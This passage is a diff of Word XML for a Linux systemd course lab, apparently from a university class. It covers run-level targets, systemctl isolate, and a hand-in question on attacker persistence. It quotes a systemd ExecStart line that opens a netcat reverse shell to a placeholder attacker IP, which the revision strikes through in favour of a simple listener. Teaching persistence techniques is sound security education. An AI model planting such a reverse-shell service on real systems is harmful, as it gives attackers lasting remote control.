+        <w:t>[john@john ~]$ systemctl list-units --type target</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>john@john</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
+        <w:t>UNIT                   LOAD   ACTIVE SUB    DESCRIPTION</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>~]$</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve"> systemctl list-units --type target</w:t>
+        <w:t>basic.target           loaded active active Basic System</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1742,7 +1721,7 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>UNIT                   LOAD   ACTIVE SUB    DESCRIPTION</w:t>
+        <w:t>cryptsetup.target      loaded active active Encrypted Volumes</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1754,91 +1733,83 @@
           <w:szCs w:val="18"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>basic.target</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
+        <w:t>getty.target           loaded active active Login Prompts</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">           loaded active </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>active</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
+        <w:t>graphical.target       loaded active active Graphical Interface</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve"> Basic System</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
+        <w:t xml:space="preserve">local-fs-pre.target    </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>cryptsetup.target</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>loaded</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">      loaded active </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
+        <w:t xml:space="preserve"> active active Local File Systems (Pre)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>active</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve"> Encrypted Volumes</w:t>
+        <w:t>local-fs.target        loaded active active Local File Systems</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1850,481 +1821,128 @@
           <w:szCs w:val="18"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>getty.target</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
+        <w:t>multi-user.target      loaded active active Multi-User System</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">           loaded active </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>active</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
+        <w:t>network-online.target  loaded active active Network is Online</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve"> Login Prompts</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>graphical.target</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t xml:space="preserve">       loaded active </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>active</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Graphical Interface</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>local-fs-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>pre.target</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>loaded</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> active </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>active</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Local File Systems (Pre)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>local-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>fs.target</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t xml:space="preserve">        loaded active </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>active</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Local File Systems</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>multi-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>user.target</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t xml:space="preserve">      loaded active </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>active</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Multi-User System</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>network-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>online.target</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  loaded active </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>active</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Network is Online</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
         <w:t>&lt;snip&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
-        <w:t>In this case, both multi-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>user.target</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> and </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>graphical.target</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> are active, so we must be in run level 5.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">My VM locks up when I try to change </w:t>
-      </w:r>
-      <w:r>
-        <w:t>run level</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> (VMware or Ubuntu graphics driver</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> problems</w:t>
-      </w:r>
-      <w:r>
-        <w:t>, probably.)  If it worked, you could c</w:t>
-      </w:r>
-      <w:r>
-        <w:t>hange to run level 3 using the command</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:iCs/>
-        </w:rPr>
-        <w:t>systemctl isolate multi-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:iCs/>
-        </w:rPr>
-        <w:t>user.target</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:iCs/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:t>This will cause all services required by the multi-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>user.target</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> unit file to continue or start, as needed.  All services not required by multi-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>user.target</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> (all the graphical stuff in our case) will be stopped.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
+        <w:t>In this case, both multi-user.target and graphical.target are active, so we must be in run level 5.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>You can</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> c</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">hange to </w:t>
+      </w:r>
+      <w:r>
+        <w:t>“</w:t>
+      </w:r>
+      <w:r>
+        <w:t>run level 3</w:t>
+      </w:r>
+      <w:r>
+        <w:t>”, where graphical.target is not running, by using</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>systemctl isolate multi-user.target</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:iCs/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:t>(My VM locks up if I am running Ubuntu 18 on VMware Player 15, but works fine with Ubuntu 20 and VMware Player 16.)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>This will cause all services required by the multi-user.target unit file to continue or start, as needed.  All services not required by multi-user.target (all the graphical stuff in our case) will be stopped.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>To return your VM back to GUI mode</w:t>
+      </w:r>
+      <w:r>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">use </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>systemctl isolate graphical.target</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+      </w:pPr>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>To return your VM back to GUI mode</w:t>
-      </w:r>
-      <w:r>
-        <w:t>,</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> you would</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> use </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:iCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">systemctl isolate </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:iCs/>
-        </w:rPr>
-        <w:t>graphical.target</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-      </w:pPr>
-      <w:r>
         <w:t>Hand in</w:t>
       </w:r>
     </w:p>
@@ -2349,14 +1967,7 @@
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>na</w:t>
+        <w:t xml:space="preserve"> -na</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2364,7 +1975,6 @@
         </w:rPr>
         <w:t>t</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -2414,6 +2024,15 @@
         <w:t>), what systemd command would you use to prevent it from running?</w:t>
       </w:r>
       <w:r>
+        <w:t xml:space="preserve">  (Note:  this requires you to read the Linux systemd slides or use some Google Fu, as we have not covered it </w:t>
+      </w:r>
+      <w:r>
+        <w:t>in this lab</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.)</w:t>
+      </w:r>
+      <w:r>
         <w:br/>
       </w:r>
     </w:p>
@@ -2435,12 +2054,24 @@
       <w:r>
         <w:t xml:space="preserve">  </w:t>
       </w:r>
-      <w:hyperlink r:id="rId10" w:history="1">
+      <w:hyperlink r:id="rId13" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>This article</w:t>
+          <w:t xml:space="preserve">This </w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>a</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>rticle</w:t>
         </w:r>
       </w:hyperlink>
       <w:r>
@@ -2449,11 +2080,9 @@
       <w:r>
         <w:t xml:space="preserve">gaining </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>persistance</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>persistence</w:t>
+      </w:r>
       <w:r>
         <w:t xml:space="preserve"> on a Linux box.  The method in the paragraph “</w:t>
       </w:r>
@@ -2466,198 +2095,176 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Some notes: instead of using the line </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>ExecStart</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>=/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>usr</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>/bin/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>nc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -e /bin/bash &lt;ATTACKER_IP&gt; &lt;PORT&gt; 2&gt;/dev/null</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
+        <w:t>Some notes: instead of using the line</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:strike/>
+        </w:rPr>
+        <w:t>ExecStart=/usr/bin/nc -e /bin/bash &lt;ATTACKER_IP&gt; &lt;PORT&gt; 2&gt;/dev/null</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">use </w:t>
+      </w:r>
+      <w:r>
+        <w:t>the</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> simpler </w:t>
+      </w:r>
+      <w:r>
+        <w:t>version below</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> to start a simple netcat listener</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">.  </w:t>
+      </w:r>
+      <w:r>
+        <w:t>His method is a reverse shell that causes the compromised box to connect back to the attack</w:t>
+      </w:r>
+      <w:r>
+        <w:t>er’s</w:t>
+      </w:r>
+      <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">use </w:t>
-      </w:r>
-      <w:r>
-        <w:t>the</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> simpler </w:t>
-      </w:r>
-      <w:r>
-        <w:t>version below</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> to start a simple netcat listener.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">  The </w:t>
-      </w:r>
